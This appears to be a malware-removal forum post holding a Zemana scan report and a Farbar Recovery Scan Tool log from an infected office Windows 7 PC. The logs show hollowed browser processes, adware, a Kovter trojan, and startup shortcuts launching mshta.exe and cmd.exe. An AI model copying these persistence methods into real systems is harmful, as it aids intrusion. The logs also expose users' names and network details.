CGTIII

Everything posted by CGTIII

Glad to have someone so experienced. You folks have competitions?

Zemana AntiMalware 2.70.2.25 (Installed)
-------------------------------------------------------
Scan Result : Completed
Scan Date : 2016/12/7
Operating System : Windows 7 64-bit
Processor : 2X Intel(R) Core(TM)2 Duo CPU E8400 @ 3.00GHz
BIOS Mode : Legacy
CUID : 120980A89B4BED509B53A6
Scan Type : System Scan
Duration : 20m 39s
Scanned Objects : 78762
Detected Objects : 18
Excluded Objects : 0
Read Level : Normal
Auto Upload : Enabled
Detect All Extensions : Disabled
Scan Documents : Disabled
Domain Info : IDS,1,3

Detected Objects
-------------------------------------------------------

iexplore.exe
Status : Scanned
Object : %programfiles%\internet explorer\iexplore.exe
MD5 : 9D2F4943A1127CAC62011A185DE78F48
Publisher : Microsoft Corporation
Size : 815304
Version : 11.0.9600.18523
Detection : Hollow Process
Cleaning Action : Repair
Related Objects :
    Process - 14524
    File - %programfiles%\internet explorer\iexplore.exe

iexplore.exe
Status : Scanned
Object : %programfiles%\internet explorer\iexplore.exe
MD5 : 9D2F4943A1127CAC62011A185DE78F48
Publisher : Microsoft Corporation
Size : 815304
Version : 11.0.9600.18523
Detection : Hollow Process
Cleaning Action : Repair
Related Objects :
    Process - 14524
    File - %programfiles%\internet explorer\iexplore.exe

iexplore.exe
Status : Scanned
Object : %programfiles%\internet explorer\iexplore.exe
MD5 : 9D2F4943A1127CAC62011A185DE78F48
Publisher : Microsoft Corporation
Size : 815304
Version : 11.0.9600.18523
Detection : Hollow Process
Cleaning Action : Repair
Related Objects :
    Process - 14052
    File - %programfiles%\internet explorer\iexplore.exe

rundll32.exe
Status : Scanned
Object : %systemroot%\syswow64\rundll32.exe
MD5 : 51138BEEA3E2C21EC44D0932C71762A8
Publisher : Microsoft Windows
Size : 44544
Version : 6.1.7600.16385
Detection : Hollow Process
Cleaning Action : Repair
Related Objects :
    Process - 1308 - C:\Windows\SysWOW64\rundll32.exe
    File - %systemroot%\syswow64\rundll32.exe

rundll32.exe
Status : Scanned
Object : %systemroot%\syswow64\rundll32.exe
MD5 : 51138BEEA3E2C21EC44D0932C71762A8
Publisher : Microsoft Windows
Size : 44544
Version : 6.1.7600.16385
Detection : Hollow Process
Cleaning Action : Repair
Related Objects :
    Process - 676 - C:\Windows\SysWOW64\rundll32.exe
    File - %systemroot%\syswow64\rundll32.exe

Hosts File
Status : Scanned
Object : %systemroot%\system32\drivers\etc\hosts
MD5 : 6A4029CFF35FD4BA34C001C1ED5D9945
Publisher : -
Size : 27
Version : -
Detection : Hosts Hijack
Cleaning Action : Repair
Related Objects :
    Hosts file - 127.0.0.1 - ca
    File - %systemroot%\system32\drivers\etc\hosts

ShopAtHomeUpdater.exe.vir
Status : Scanned
Object : %userprofile%\downloads\adwcleaner\filequarantine\c\users\reception\appdata\roaming\shopathome\shopathomehelper\shopathomeupdater.exe.vir
MD5 : 34BA770EDE3145CD052DCC1C49DF6077
Publisher : ShopAtHome.com (Belcaro Group, Inc.)
Size : 199864
Version : 7.10.2.10
Detection : Adware:Win32/ShopAtHome!Ep
Cleaning Action : Quarantine
Related Objects :
    File - %userprofile%\downloads\adwcleaner\filequarantine\c\users\reception\appdata\roaming\shopathome\shopathomehelper\shopathomeupdater.exe.vir

ShopAtHomeHelperPS.dll.vir
Status : Scanned
Object : %userprofile%\downloads\adwcleaner\filequarantine\c\users\reception\appdata\roaming\shopathome\shopathomehelper\shopathomehelperps.dll.vir
MD5 : AAF42A00AE49E8B02E4DE14D8A850254
Publisher : ShopAtHome.com (Belcaro Group, Inc.)
Size : 54456
Version : 7.10.2.10
Detection : Adware:Win32/ShopAtHome!Ep
Cleaning Action : Quarantine
Related Objects :
    File - %userprofile%\downloads\adwcleaner\filequarantine\c\users\reception\appdata\roaming\shopathome\shopathomehelper\shopathomehelperps.dll.vir

ShopAtHomeWatcher.exe.vir
Status : Scanned
Object : %userprofile%\downloads\adwcleaner\filequarantine\c\users\reception\appdata\roaming\shopathome\shopathomehelper\shopathomewatcher.exe.vir
MD5 : 339F02063C8E27BFC3CFAC8B522FF033
Publisher : ShopAtHome.com (Belcaro Group, Inc.)
Size : 138048
Version : 7.10.8.4
Detection : Adware:Win32/ShopAtHome!Ep
Cleaning Action : Quarantine
Related Objects :
    File - %userprofile%\downloads\adwcleaner\filequarantine\c\users\reception\appdata\roaming\shopathome\shopathomehelper\shopathomewatcher.exe.vir

APNIC.dll.vir
Status : Scanned
Object : %userprofile%\downloads\adwcleaner\filequarantine\c\programdata\ask\apn-stub\ad5\apnic.dll.vir
MD5 : 8389842EC050DDF21585829675798C2D
Publisher : Ask.com
Size : 213192
Version : 5.2.3.0
Detection : Adware:Win32/AskBrowserHijack!Ep
Cleaning Action : Quarantine
Related Objects :
    File - %userprofile%\downloads\adwcleaner\filequarantine\c\programdata\ask\apn-stub\ad5\apnic.dll.vir

TBUpdaterLogic_1.0.0.1.dll.vir
Status : Scanned
Object : %userprofile%\downloads\adwcleaner\filequarantine\c\users\reception\appdata\local\conduit\backgroundcontainer\tbupdaterlogic_1.0.0.1.dll.vir
MD5 : DBA5610430A43DCC2D1FE60905C078A7
Publisher : Conduit Ltd.
Size : 278272
Version : 1.0.0.1
Detection : Win32/Adware.Conduit!Ep
Cleaning Action : Quarantine
Related Objects :
    File - %userprofile%\downloads\adwcleaner\filequarantine\c\users\reception\appdata\local\conduit\backgroundcontainer\tbupdaterlogic_1.0.0.1.dll.vir

BackgroundContainer.dll.vir
Status : Scanned
Object : %userprofile%\downloads\adwcleaner\filequarantine\c\users\reception\appdata\local\conduit\backgroundcontainer\backgroundcontainer.dll.vir
MD5 : FD42EA980FE1833B3A5EB429273CD1B2
Publisher : Conduit Ltd.
Size : 319264
Version : 1.0.0.15
Detection : Win32/Adware.Conduit!Ep
Cleaning Action : Quarantine
Related Objects :
    File - %userprofile%\downloads\adwcleaner\filequarantine\c\users\reception\appdata\local\conduit\backgroundcontainer\backgroundcontainer.dll.vir

TBVerifier.dll.vir
Status : Scanned
Object : %userprofile%\downloads\adwcleaner\filequarantine\c\program files (x86)\conduit\ct3306061\plugins\tbverifier.dll.vir
MD5 : 88F395EC3145BF31786738261F0C373F
Publisher : Conduit Ltd.
Size : 297248
Version : 3.0.0.2
Detection : Win32/Adware.Conduit!Ep
Cleaning Action : Quarantine
Related Objects :
    File - %userprofile%\downloads\adwcleaner\filequarantine\c\program files (x86)\conduit\ct3306061\plugins\tbverifier.dll.vir

RibbonConfig.exe.vir
Status : Scanned
Object : %userprofile%\downloads\adwcleaner\filequarantine\c\users\reception\appdata\roaming\shopathome\shopathomehelper\ribbonconfig.exe.vir
MD5 : E0DF66E7A5654F956442DFF81009E5D5
Publisher : ShopAtHome.com (Belcaro Group, Inc.)
Size : 153784
Version : -
Detection : Adware:Win32/ShopAtHome!Ep
Cleaning Action : Quarantine
Related Objects :
    File - %userprofile%\downloads\adwcleaner\filequarantine\c\users\reception\appdata\roaming\shopathome\shopathomehelper\ribbonconfig.exe.vir

Exec.exe.vir
Status : Scanned
Object : %userprofile%\downloads\adwcleaner\filequarantine\c\users\reception\appdata\roaming\shopathome\shopathomehelper\exec.exe.vir
MD5 : 386B88945F182E98F7521A7F2D570C8F
Publisher : ShopAtHome.com (Belcaro Group, Inc.)
Size : 62136
Version : -
Detection : Adware:Win32/ShopAtHome!Ep
Cleaning Action : Quarantine
Related Objects :
    File - %userprofile%\downloads\adwcleaner\filequarantine\c\users\reception\appdata\roaming\shopathome\shopathomehelper\exec.exe.vir

TBUpdaterLogic_1.0.0.2.dll.vir
Status : Scanned
Object : %userprofile%\downloads\adwcleaner\filequarantine\c\users\reception\appdata\local\conduit\backgroundcontainer\tbupdaterlogic_1.0.0.2.dll.vir
MD5 : 1E6D9E1EB2729FC9879B666695D6F46A
Publisher : Conduit Ltd.
Size : 278272
Version : 1.0.0.2
Detection : Win32/Adware.Conduit!Ep
Cleaning Action : Quarantine
Related Objects :
    File - %userprofile%\downloads\adwcleaner\filequarantine\c\users\reception\appdata\local\conduit\backgroundcontainer\tbupdaterlogic_1.0.0.2.dll.vir

ShopAtHomeHelper.exe.vir
Status : Scanned
Object : %userprofile%\downloads\adwcleaner\filequarantine\c\users\reception\appdata\roaming\shopathome\shopathomehelper\shopathomehelper.exe.vir
MD5 : 49B2E542A7ED7C44A2C4F84B5008DF72
Publisher : ShopAtHome.com (Belcaro Group, Inc.)
Size : 1125184
Version : 7.10.8.4
Detection : Adware:Win32/ShopAtHome!Ep
Cleaning Action : Quarantine
Related Objects :
    File - %userprofile%\downloads\adwcleaner\filequarantine\c\users\reception\appdata\roaming\shopathome\shopathomehelper\shopathomehelper.exe.vir

d848.lnk
Status : Scanned
Object : NE->c:\users\reception\appdata\local\7b8b\d848.lnk
MD5 : -
Publisher : -
Size : -
Version : -
Detection : Trojan:Win32/Kovter.B!Neng
Cleaning Action : Quarantine
Related Objects :
    (null) - (null)

Cleaning Result
-------------------------------------------------------
Cleaned : 13
Reported as safe : 0
Failed : 5

Failed Objects
-------------------------------------------------------

rundll32.exe
Status : Scanned
Object : %systemroot%\syswow64\rundll32.exe
MD5 : 51138BEEA3E2C21EC44D0932C71762A8
Publisher : Microsoft Windows
Size : 44544
Version : 6.1.7600.16385
Detection : Hollow Process
Cleaning Action : Repair
Related Objects :
    Process - 676 - C:\Windows\SysWOW64\rundll32.exe
    File - %systemroot%\syswow64\rundll32.exe

rundll32.exe
Status : Scanned
Object : %systemroot%\syswow64\rundll32.exe
MD5 : 51138BEEA3E2C21EC44D0932C71762A8
Publisher : Microsoft Windows
Size : 44544
Version : 6.1.7600.16385
Detection : Hollow Process
Cleaning Action : Repair
Related Objects :
    Process - 1308
    File - %systemroot%\syswow64\rundll32.exe

iexplore.exe
Status : Scanned
Object : %programfiles%\internet explorer\iexplore.exe
MD5 : 9D2F4943A1127CAC62011A185DE78F48
Publisher : Microsoft Corporation
Size : 815304
Version : 11.0.9600.18523
Detection : Hollow Process
Cleaning Action : Repair
Related Objects :
    Process - 14052
    File - %programfiles%\internet explorer\iexplore.exe

iexplore.exe
Status : Scanned
Object : %programfiles%\internet explorer\iexplore.exe
MD5 : 9D2F4943A1127CAC62011A185DE78F48
Publisher : Microsoft Corporation
Size : 815304
Version : 11.0.9600.18523
Detection : Hollow Process
Cleaning Action : Repair
Related Objects :
    Process - 14524
    File - %programfiles%\internet explorer\iexplore.exe

iexplore.exe
Status : Scanned
Object : %programfiles%\internet explorer\iexplore.exe
MD5 : 9D2F4943A1127CAC62011A185DE78F48
Publisher : Microsoft Corporation
Size : 815304
Version : 11.0.9600.18523
Detection : Hollow Process
Cleaning Action : Repair
Related Objects :
    Process - 14524
    File - %programfiles%\internet explorer\iexplore.exe


Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 07-12-2016
Ran by Reception (administrator) on PC-4 (07-12-2016 06:03:41)
Running from \\SPARTA\RedirectedFolders\Reception\Desktop
Loaded Profiles: Clayton & dcreery & blagler & Reception (Available Profiles: Clayton & dcreery & blagler & Reception)
Platform: Windows 7 Professional Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
() C:\Program Files (x86)\Backblaze\bzserv.exe
(FileZilla Project) C:\Program Files (x86)\FileZilla Server\FileZilla Server.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LMIGuardianSvc.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\ramaint.exe
(Print Tracker (866) 629-3342) C:\Program Files (x86)\Print Tracker\PMonitor.exe
(Print Tracker (866) 629-3342) C:\Program Files (x86)\Print Tracker\PMonitor.kpr
() C:\Windows\SysWOW64\PSIService.exe
(Symantec Corporation) C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ccSvcHst.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LogMeIn.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Symantec Corporation) C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\Smc.exe
(Symantec Corporation) C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ccSvcHst.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.31.5\GoogleCrashHandler.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\BusinessMessaging.exe
(Microsoft Corporation) C:\Windows\System32\mobsync.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.31.5\GoogleCrashHandler64.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LogMeIn.exe
(Zemana Ltd.) C:\Program Files (x86)\Zemana AntiMalware\ZAM.exe
(Zemana Ltd.) C:\Program Files (x86)\Zemana AntiMalware\ZAM.exe
(Farbar) \\SPARTA\RedirectedFolders\Reception\Desktop\FRST64.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe

==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [176952 2016-07-26] (Apple Inc.)
HKLM\...\Run: [LogMeIn GUI] => C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe [57928 2013-11-05] (LogMeIn, Inc.)
HKLM\...\Run: [ZAM] => C:\Program Files (x86)\Zemana AntiMalware\ZAM.exe [13915888 2016-11-22] (Zemana Ltd.)
HKLM-x32\...\Run: [FileZilla Server Interface] => C:\Program Files (x86)\FileZilla Server\FileZilla Server Interface.exe [2452480 2015-01-09] (FileZilla Project)
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe [96056 2013-05-30] (Hewlett-Packard)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [Malwarebytes Anti-Malware] => C:\Program Files (x86)\Malwarebytes Anti-Malware\BusinessMessaging.exe [3219456 2016-12-06] (Malwarebytes)
Winlogon\Notify\GoToAssist: C:\Program Files (x86)\Citrix\GoToAssist Corporate\1019\G2AWinLogon_x64.dll (Citrix Online, a division of Citrix Systems, Inc.)
Winlogon\Notify\GoToAssist Express Customer: C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\888\g2ax_winlogonx64.dll (Citrix Systems, Inc.)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-3320201264-2921037059-4171379232-1192\...\Run: [**suokibuts<*>] => "C:\Users\Reception\AppData\Local\7b8b\d848.lnk" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-3320201264-2921037059-4171379232-1192\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\system32\Ribbons.scr [241664 2010-11-20] (Microsoft Corporation)
HKU\S-1-5-18\...\Run: [Backblaze] => C:\Program Files (x86)\Backblaze\bzbui.exe [596648 2016-11-14] ()
IFEO\ehshell.exe: [Debugger] "C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe" -MceShellRedirect
Startup: \\SPARTA\RedirectedFolders\Reception\Start Menu\Programs\Startup\0783.lnk [2016-10-12]
ShortcutTarget: 0783.lnk -> C:\Windows\System32\mshta.exe (Microsoft Corporation)
Startup: \\SPARTA\RedirectedFolders\Reception\Start Menu\Programs\Startup\356a.lnk [2016-12-07]
ShortcutTarget: 356a.lnk -> C:\Windows\System32\mshta.exe (Microsoft Corporation)
Startup: \\SPARTA\RedirectedFolders\Reception\Start Menu\Programs\Startup\5cf1.lnk [2016-11-23]
ShortcutTarget: 5cf1.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.0.105 192.168.0.1
Tcpip\..\Interfaces\{0B496D74-E088-4F45-B2FD-58E5E9F5F3E1}: [DhcpNameServer] 192.168.0.105 192.168.0.1
Tcpip\..\Interfaces\{A4BE6A85-3332-4C3B-A231-82D7AFF8DAF1}: [DhcpNameServer] 172.20.10.1

Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-3320201264-2921037059-4171379232-1142\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\s-1-5-21-3320201264-2921037059-4171379232-1164\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\s-1-5-21-3320201264-2921037059-4171379232-1166\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-3320201264-2921037059-4171379232-1192\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.symantec.com/enterprise/security_response/index.jsp?inid=biz_SR_sep_V12_1_MR_4
HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.symantec.com/enterprise/security_response/index.jsp?inid=biz_SR_sep_V12_1_MR_4
HKU\s-1-5-21-1158510682-2263174364-945799988-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.symantec.com/enterprise/security_response/index.jsp?inid=biz_SR_sep_V12_1_MR_4
HKU\S-1-5-21-3320201264-2921037059-4171379232-1142\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.symantec.com/enterprise/security_response/index.jsp?inid=biz_SR_sep_V12_1_MR_4
HKU\S-1-5-21-3320201264-2921037059-4171379232-1142\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://companyweb
HKU\s-1-5-21-3320201264-2921037059-4171379232-1164\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.symantec.com/enterprise/security_response/index.jsp?inid=biz_SR_sep_V12_1_MR_4
HKU\s-1-5-21-3320201264-2921037059-4171379232-1164\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://companyweb
HKU\s-1-5-21-3320201264-2921037059-4171379232-1166\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.symantec.com/enterprise/security_response/index.jsp?inid=biz_SR_sep_V12_1_MR_4
HKU\S-1-5-21-3320201264-2921037059-4171379232-1192\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-21-3320201264-2921037059-4171379232-1192\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/?ocid=iehp
SearchScopes: HKLM-x32 -> DefaultScope {1A6ECD44-6984-4DCD-B3DF-84F92EC8DA9E} URL =
BHO: TmIEPlugInBHO Class -> {1CA1377B-DC1D-4A52-9585-6E06050FAC53} -> C:\Program Files\Trend Micro\AMSP\Module\20004\1.6.1106\6.6.1045\TmIEPlg.dll => No File
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO-x32: Symantec Vulnerability Protection -> {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -> C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\bin\IPS\IPSBHO.DLL [2014-10-03] (Symantec Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
Toolbar: HKLM-x32 - Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2012-12-18] (Adobe Systems Incorporated)
Toolbar: HKU\s-1-5-21-3320201264-2921037059-4171379232-1166 -> No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - No File
Toolbar: HKU\S-1-5-21-3320201264-2921037059-4171379232-1192 -> No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - No File
DPF: HKLM-x32 {73ECB3AA-4717-450C-A2AB-D00DAD9EE203} hxxp://h20270.www2.hp.com/ediags/gmn2/install/HPProductDetection2.cab
DPF: HKLM-x32 {E2883E8F-472F-4FB0-9522-AC9BF37916A7} hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
Handler: tmpx - {0E526CB5-7446-41D1-A403-19BFE95E8C23} - C:\Program Files\Trend Micro\AMSP\Module\20004\1.6.1106\6.6.1045\TmIEPlg32.dll No File
Handler: tmtbim - {0B37915C-8B98-4B9E-80D4-464D2C830D10} - C:\Program Files\Trend Micro\Client Server Security Agent\UIFramework\ProToolbarIMRatingActiveX.dll No File

FireFox:
========
FF ProfilePath: C:\Users\Reception\AppData\Roaming\Mozilla\Firefox\Profiles\biqbxlip.default-1478011673580 [2016-11-09]
FF HKLM-x32\...\Firefox\Extensions: [{22C7F6C6-8D67-4534-92B5-529A0EC09405}] - C:\Program Files\Trend Micro\AMSP\Module\20004\1.6.1106\6.6.1045\firefoxextension => not found
FF HKLM-x32\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3
FF Extension: (HP Smart Web Printing) - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3 [2011-05-13] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [web2pdfextension@web2pdf.adobedotcom] - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn
FF Extension: (Adobe Acrobat - Create PDF) - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn [2013-04-03] [not signed]
FF HKU\S-1-5-21-3320201264-2921037059-4171379232-1192\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_23_0_0_207.dll [2016-11-08] ()
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_23_0_0_207.dll [2016-11-08] ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2015-12-18] ()
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @rocketlife.com/RocketLife Secure Plug-In Layer;version=1.0.5 -> C:\ProgramData\Visan\plugins\npRLSecurePluginLayer.dll [2014-02-18] (RocketLife, LLP)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-11-09] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-11-09] (Google Inc.)
FF Plugin-x32: Adobe Acrobat -> C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Air\nppdf32.dll [2013-02-15] (Adobe Systems Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll [2013-12-18] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-3320201264-2921037059-4171379232-1192: @citrixonline.com/appdetectorplugin -> C:\Users\Reception\AppData\Local\Citrix\Plugins\104\npappdetector.dll [2014-06-05] (Citrix Online)

Chrome:
=======
CHR Profile: C:\Users\Reception\AppData\Local\Google\Chrome\User Data\Default [2016-12-06]
CHR Extension: (No Name) - C:\Users\Reception\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2016-11-09]
CHR Extension: (No Name) - C:\Users\Reception\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-11-09]
CHR Extension: (No Name) - C:\Users\Reception\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-11-09]
CHR Extension: (No Name) - C:\Users\Reception\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-11-09]
CHR Extension: (No Name) - C:\Users\Reception\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2016-11-09]
CHR Extension: (No Name) - C:\Users\Reception\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-11-09]
CHR Extension: (Avast Online Security) - C:\Users\Reception\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki [2016-11-09]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Reception\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-11-09]
CHR Extension: (No Name) - C:\Users\Reception\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-11-09]
CHR Extension: (Chrome Media Router) - C:\Users\Reception\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-12-06]

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [83768 2016-03-02] (Apple Inc.)
R2 bzserv; C:\Program Files (x86)\Backblaze\bzserv.exe [356008 2016-11-14] ()
R2 FileZilla Server; C:\Program Files (x86)\FileZilla Server\FileZilla Server.exe [774656 2015-01-09] (FileZilla Project) [File not signed]
S3 GoToAssist; C:\Program Files (x86)\Citrix\GoToAssist Corporate\1019\g2aservice.exe [309080 2014-06-05] (Citrix Online, a division of Citrix Systems, Inc.)
S3 GoToAssist Remote Support Customer; C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\888\g2ax_service.exe [610528 2016-01-12] (Citrix Systems, Inc.)
R2 HPSLPSVC; C:\Program Files (x86)\HP\Digital Imaging\bin\HPSLPSVC64.DLL [1039360 2010-10-22] (Hewlett-Packard Co.) [File not signed]
R2 LMIGuardianSvc; C:\Program Files (x86)\LogMeIn\x64\LMIGuardianSvc.exe [419336 2016-10-12] (LogMeIn, Inc.)
R2 LMIMaint; C:\Program Files (x86)\LogMeIn\x64\RaMaint.exe [509448 2016-10-12] (LogMeIn, Inc.)
R2 LogMeIn; C:\Program Files (x86)\LogMeIn\x64\LogMeIn.exe [407424 2013-11-05] (LogMeIn, Inc.)
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2010-08-06] (Hewlett-Packard) [File not signed]
